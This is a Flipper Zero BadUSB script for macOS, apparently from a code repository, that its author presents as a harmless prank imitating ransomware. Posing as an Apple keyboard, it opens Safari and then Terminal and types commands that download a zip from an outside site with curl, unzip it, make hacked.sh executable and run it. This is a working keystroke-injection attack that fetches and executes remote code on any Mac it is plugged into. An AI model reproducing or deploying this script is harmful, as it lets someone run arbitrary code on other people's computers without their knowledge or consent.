flipperzero/badusb/corteximplant-ransomware-macos.txt

40 lines
705 B
Text
Raw Permalink Normal View History

REM -----
REM Useless fun BadUSB script meant to imitate ransomware.
REM Open corteximplant.org in Safari and then
REM download hacked.sh, a bash script with the appearance of randomware.
REM
REM Created by Revengeday
REM Fedi: @revengeday@corteximplant.com
REM -----
ID 1234:5678 Apple:Keyboard
DELAY 500
GUI SPACE
DELAY 500
STRING safari
ENTER
DELAY 1500
STRING corteximplant.org
ENTER
DELAY 1500
GUI SPACE
DELAY 500
STRING terminal
ENTER
DELAY 1500
STRING curl -O https://corteximplant.org/stuff/hacked.zip
ENTER
DELAY 5000
STRING unzip hacked.zip
ENTER
DELAY 1500
STRING rm hacked.zip
ENTER
DELAY 1500
STRING chmod +x hacked.sh
ENTER
DELAY 1500
STRING clear
ENTER
DELAY 500
STRING ./hacked.sh
ENTER